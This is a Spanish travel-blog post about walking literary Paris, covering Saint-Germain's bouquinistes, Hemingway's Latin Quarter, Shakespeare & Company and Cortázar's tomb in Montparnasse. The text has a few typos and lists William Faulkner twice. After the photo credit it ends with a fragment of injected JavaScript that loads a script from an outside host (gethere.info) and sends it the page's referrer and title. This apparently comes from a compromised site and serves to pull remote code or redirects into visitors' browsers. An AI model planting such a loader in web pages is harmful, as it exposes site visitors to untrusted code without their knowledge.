Vagabundeo literario por París

18/02/2016

París literario_Steve Taylor

Pocas ciudades son tan literarias como París. En ella, el viajero podría prescindir de mapas y de brújula y podría buscar orientación en la literatura, en los autores que por ella transitaron, en los libros que tomaron a la ciudad como escenario. París es una ciudad para viajeros con muchas letras que gusten de recorrerla al estilo de Baudelaire, como un auténtico paseante, como un flâneur moderno, capaz de encontrar en cada lugar la referencia literaria adecuada.

Recorrido literario en París

Si te gusta la literatura, leer y conocer la vida de los escritores, sentir por donde pasearon, descubrir anécdotas de tus autores favoritos, entonces, éste recorrido literario por París será tu lectura imprescindible.

Barrios literarios

París es una ciudad de barrios y en su conjunto están las diversas caras de la ciudad. Para iniciar un recorrido literario, el viajero empezará a caminar por Saint Germain. Siguiendo el curso del Sena, encontrará a los famosos libreros, los bouquinistes que muestran lomos de libros como tesoros. Este barrio ha sido siempre transitado por intelectuales y escritores, como la pareja formada por Sartre y Simon de Beauvoir.

Si seguimos el curso del Sena dejando a nuestras espaldas la Tour Eiffel, llegaremos a otro de los escenarios literarios de París, el Barrio Latino. Éste fue el barrio favorito de Ernest  Hemingway. El autor, en su novela “París era una fiesta”, cuenta cómo era su vida en los cafés, a dónde solía ir a escribir y tomarse unas copas de vino. Aún hoy puedes ir a inspirarte por sus calles bohemias, como lo hicieron, además de Hemingway, escritores como James Joyce o George Orwell.

Una librería mítica

Cualquier librería es un oasis de esperanza., ya sean grandes o pequeñas, bonitas o sencillas, concurridas o solitarias, de libros viejos o nuevos. Pero también es cierto que las hay más famosas o menos. Entre la categoría de librerías más famosas del mundo, se encuentra, como mínimo, la Shakespeare & Company, la que es conocida como la librería de la generación perdida. Su propietaria, Sylvia Beach, recibía en la tienda a aquellos autores norteamericanos que llegaron a Europa, como John Steinbeck, William Faulkner, Ezra Pound, o William Faulkner o Ernest Hemingway.

Una tumba para para cronopios

Hay dos ciudades que se vinculan con Julio Cortázar. La primera es Buenos Aires, y la segunda, en orden, que no en importancia, es París. En la ciudad, Julio Cortázar, más que escritor, un amante de la literatura, supo sentir con intensidadesa cualidad literaria que se remonta a Baudelaire. El autor de “Cronopios y Fama” dejó plasmado su amor por ambas ciudades en su famosa novela “Rayuela”.

A su muerte, Julio Cortázar fue enterrado en París, en el cementerio de Montparnasse. Su tumba se ha convertido en una gran atracción turística a la que llegan miles de incondicionales, porque Cortázar más que lectores lo que tiene es seguidores. Son muchos los que a diario, desde 1984, acuden a dejar notas y regalos sobre la lápida del autor.

Vagabundos literarios

París es para los exploradores urbanos como una gran biblioteca llena de libros. No obstante, diría el historiador Anaïs Bazin, “el único, el verdadero soberano de París es el flâneur.” Vayamos, pues, en busca de ese París literario, sólo apto para verdaderos soberanos ¿Y tú, que lugares literarios conoces de París?

Foto| Steve Taylors.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;